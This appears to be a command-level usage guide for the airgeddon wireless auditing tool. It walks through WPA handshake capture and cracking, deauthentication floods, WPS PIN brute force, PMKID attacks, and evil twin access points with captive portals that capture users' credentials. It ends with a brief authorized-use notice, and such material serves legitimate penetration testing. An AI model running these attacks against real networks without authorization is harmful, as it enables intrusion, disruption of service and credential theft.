Installation
Prerequisites
# Debian/Ubuntu
sudo apt-get update
sudo apt-get install git curl
sudo apt-get install aircrack-ng netcat-openbsd dnsmasq hostapd
# Arch Linux
sudo pacman -S aircrack-ng openbsd-netcat dnsmasq hostapd
# Dependencies for optional features
sudo apt-get install pixiewps bully reaver hcxdumptool hashcat
Clone and Setup
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
chmod +x airgeddon.sh
sudo ./airgeddon.sh
Docker Installation
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged -v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Starting airgeddon
Basic Launch
# Run as root (required for monitor mode and packet injection)
sudo ./airgeddon.sh
# Run with language override
sudo ./airgeddon.sh -i es
Command-Line Options
./airgeddon.sh --help # Show help menu
./airgeddon.sh -l # List available languages
./airgeddon.sh -i [LANG] # Set interface language
./airgeddon.sh --check # Verify dependencies only
Interface Selection and Monitor Mode
WiFi Interface Selection
Main Menu → Change WiFi interface
Select your wireless adapter (wlan0, wlan1, etc.)
Enable Monitor Mode
Main Menu → Monitor Mode
↳ Enable monitor mode on selected interface
↳ System will create mon0 (or similar)
↳ Required for all scanning operations
Disable Monitor Mode
Main Menu → Monitor Mode → Disable
# Or manually:
sudo airmon-ng stop wlan0
Verify Monitor Mode
# Check active interfaces
iwconfig
# Should show "Mode:Monitor"
# Interface mon0 or similar active
Network Scanning
Scan Nearby Networks
Main Menu → Scanning
↳ Explore networks around you
↳ View SSID, BSSID, Channel, Power, etc.
View Scan Results
Available columns:
SSID - Network name
BSSID - MAC address (AA:BB:CC:DD:EE:FF)
Channel - WiFi channel (1-14 or 5G)
Security - WPA2, WPA, WEP, Open
Power - Signal strength (dBm)
Clients - Connected devices
Filter Scan Results
During scan, you can:
1. Select networks by BSSID
2. Filter by channel
3. Save results to file
Handshake Capture (WPA/WPA2)
Capture WPA2 Handshake
Main Menu → Attacks → Capture handshake
1. Select target network from scan
2. Choose capture interface (mon0)
3. Let it run until "Handshake captured" message
4. Ctrl+C to stop
Deauthentication During Capture
Main Menu → Attacks → Capture handshake → Deauthentication
↳ Optional: Automatically send deauth frames
↳ Forces clients to reconnect and capture handshake
↳ Choose deauth timing (delay)
Manual Handshake Capture (Advanced)
# Terminal 1: Start airodump-ng (capture packets)
sudo airodump-ng --bssid [BSSID] --channel [CH] \
--write handshake mon0
# Terminal 2: Send deauth frames (forces reconnect)
sudo aireplay-ng --deauth 0 -a [BSSID] \
-c [CLIENT_MAC] mon0
# Stop (Ctrl+C) when 4-way handshake captured
WPA/WPA2 Cracking
Dictionary Attack
Main Menu → Attacks → Crack handshake
↳ Wordlist-based cracking
1. Select handshake (.cap file)
2. Choose wordlist
- rockyou.txt (common)
- Custom wordlist
3. Start aircrack-ng
4. Wait for password discovery
Common Wordlists
# Download rockyou.txt
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
tar -xzf rockyou.txt.tar.gz
# Use in airgeddon
# Point to wordlist path in cracking menu
Brute Force Attack
Main Menu → Attacks → Crack handshake → Brute force
↳ Character-based cracking (slower, finds unknown passwords)
1. Select handshake
2. Set character set (lowercase, uppercase, numbers, symbols)
3. Set min/max length
4. Start attack (can take hours/days)
GPU-Accelerated Cracking
# Use hashcat (requires GPU)
hashcat -m 22000 handshake.22000 rockyou.txt
# Convert .cap to hashcat format first
sudo hcxdumptool -o hash.22000 -e handshake.cap
Evil Twin / Rogue AP Attacks
Create Evil Twin (Basic)
Main Menu → Attacks → Evil Twin
1. Scan and select target network
2. Create fake SSID (clone or custom)
3. Set up DHCP server
4. Start hostapd (rogue AP)
5. Optional: Enable DNS spoofing
Evil Twin with Captive Portal
Main Menu → Attacks → Evil Twin → With Captive Portal
1. Select target SSID
2. Configure captive portal page
3. Set redirect URL
4. Start malicious AP
5. Capture credentials from users
Evil Twin Configuration
Configure before launch:
Interface - mon0 or AP interface
SSID - Network name (can clone target)
Channel - Match target channel
Encryption - WPA2 or Open
DHCP Range - IP address pool (192.168.1.0/24)
Gateway IP - 192.168.1.1
DNS - Redirect to custom page
Stop Evil Twin
Main Menu → Stop attacks
↳ Kill hostapd and dnsmasq
↳ Restore network settings
WPS Attacks
WPS Reaver Attack (PIN Brute Force)
Main Menu → Attacks → WPS attacks → Reaver
1. Select target network
2. Enable Reaver
3. Start PIN guessing (up to 10,000 combinations)
4. Takes ~4-10 hours
5. On success: recovers WiFi password directly
WPS Bully Attack
Main Menu → Attacks → WPS attacks → Bully
↳ Faster WPS cracking alternative
1. Select target
2. Choose BULLY mode
3. More efficient on some routers
4. Fewer requests than Reaver
Pixie Dust Attack (WPS Shortcut)
Main Menu → Attacks → WPS attacks → Pixie Dust
↳ MUCH faster (minutes vs hours)
1. Select vulnerable router
2. Start Pixie Dust
3. Recovers WPS PIN in minutes
4. PIN = WiFi password
Check WPS Status
# Before attack:
sudo reaver -i mon0 -b [BSSID] -S
# Shows:
# - WPS version
# - Lock status
# - Vulnerability indicators
DoS and Deauthentication Attacks
Deauthentication Attack
Main Menu → Attacks → Deauth/DoS
1. Select target BSSID
2. Choose client MAC (or broadcast)
3. Set frame count (0 = infinite)
4. Start attack
5. Disconnects all clients from network
Deauth Specific Client
# Terminal method:
sudo aireplay-ng --deauth 100 \
-a [TARGET_BSSID] \
-c [CLIENT_MAC] mon0
Deauth All Clients
# Broadcast deauth to all clients:
sudo aireplay-ng --deauth 0 \
-a [TARGET_BSSID] mon0
Packet Injection Test
# Verify AP accepts injected frames:
sudo aireplay-ng --test -a [BSSID] mon0
# Required for deauth attacks to work
PMKID Attack (WPA3/WPA2)
PMKID Capture
Main Menu → Attacks → PMKID attacks
1. Select target network
2. Start PMKID sniffing
3. Capture PMKID from probe requests
4. No client reconnection needed
PMKID Cracking
Main Menu → Attacks → PMKID attacks → Crack
1. Select captured PMKID file
2. Choose wordlist
3. Start hashcat (GPU preferred)
4. Faster than 4-way handshake
# Capture PMKID packets
sudo hcxdumptool -i mon0 -o pmkid.pcapng --disable-status
# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng
# Crack
hashcat -m 22000 pmkid.22000 wordlist.txt
Enterprise Network Attacks
WPA-Enterprise (802.1X) Attacks
Main Menu → Attacks → Enterprise networks
↳ Requires username/password knowledge
1. Capture RADIUS handshakes
2. Set up fake RADIUS server
3. Create evil twin of enterprise AP
4. Redirect clients to fake auth
KARMA Attack (Evil Twin Beacon)
Main Menu → Attacks → KARMA
1. Listen for probe requests
2. Echo back any SSID clients probe for
3. Clients auto-connect to fake network
4. Capture credentials
Main Menu Structure
airgeddon
├── Change WiFi interface
├── Monitor Mode (Enable/Disable)
├── Scanning
├── Attacks
│ ├── Capture handshake
│ ├── Crack handshake
│ ├── Evil Twin
│ ├── WPS attacks
│ ├── Deauth/DoS
│ ├── PMKID attacks
│ └── Enterprise attacks
├── Tools
│ ├── Packet injection test
│ ├── Traffic monitoring
│ └── Check dependencies
├── Language selection
└── Exit
Quick Navigation Tips
• Use arrow keys / numbers to select
• Press Enter to confirm
• Ctrl+C to cancel/go back
• Follow prompts for each attack
• Monitor windows show real-time progress
Dependencies and Requirements
aircrack-ng # Core WiFi cracking suite
netcat # Network utilities
dnsmasq # DHCP/DNS server
hostapd # AP emulation
iw # WiFi interface control
reaver # WPS PIN cracking
bully # WPS alternative
pixiewps # Pixie Dust attacks
hcxdumptool # PMKID capture
hashcat # GPU cracking
mdk3 # Advanced DoS
macchanger # MAC spoofing
Verify Dependencies
# Run built-in checker
sudo ./airgeddon.sh --check
# Manual verification
which aircrack-ng
which hostapd
which reaver
Docker Usage
Pull and Run
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Docker with Host Network
docker run -it --privileged --net host \
-v /sys/kernel/debug:/sys/kernel/debug \
v1s1t0r1sh3r3/airgeddon:latest
Mount Local Wordlist
docker run -it --privileged \
-v ~/wordlists:/root/wordlists \
v1s1t0r1sh3r3/airgeddon:latest
Troubleshooting
Monitor Mode Won’t Enable
# Check conflicts
sudo airmon-ng check kill
# Force interface down and restart
sudo ip link set wlan0 down
sudo airmon-ng start wlan0
No Networks Detected
# Verify monitor mode active
iwconfig | grep Monitor
# Check antenna
sudo iw list | grep -i antenna
# Try different channel range
# Some adapters don't scan 5GHz by default
Handshake Capture Fails
# Increase deauth attempts
sudo aireplay-ng --deauth 50 -a [BSSID] mon0
# Check channel matches
sudo iwconfig mon0
# Verify adapter supports injection
sudo aireplay-ng --test -a [BSSID] mon0
WPS Attack Not Working
# Verify target supports WPS
sudo reaver -i mon0 -b [BSSID] -S
# Some routers lock WPS (try Pixie Dust first)
# Check for rate limiting/lockout status
Evil Twin Connection Issues
# Check DHCP logs
tail -f /var/log/dnsmasq.log
# Verify hostapd running
ps aux | grep hostapd
# Check IP forwarding
sudo sysctl net.ipv4.ip_forward=1
Legal and Ethical Notes
⚠️ Only use on networks you own or have explicit permission to test
⚠️ Unauthorized network access is illegal in most jurisdictions
⚠️ Use for authorized penetration testing and security research only
⚠️ Always obtain written authorization before testing
Resources
